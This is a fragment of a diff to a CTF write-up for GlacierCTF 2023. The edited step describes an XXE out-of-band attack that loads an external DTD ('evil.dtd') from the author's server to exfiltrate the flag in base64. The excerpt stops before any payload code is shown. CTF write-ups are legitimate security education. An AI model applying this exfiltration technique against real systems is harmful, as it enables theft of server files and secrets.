kashmir54/kashmir54.github.io/_ctfs/GlacierCTF2023/index.md

 </html>
 ```

-3. Create an XXE Out-of-band payload to exfiltrate the flag.
-For this we used a payload that loads the external DTD from our server that we used to send the file content to our server:
+3 - Create an XXE Out-of-band payload to exfiltrate the flag.
+For this, we used a payload that loads the external DTD from our server, then the DTD will exfiltrate the flag in base64 format.
+We called %send since it is the entity on our evil.dtd file:

 ```xml
 <!-- Payload to send to the POST on map.php -->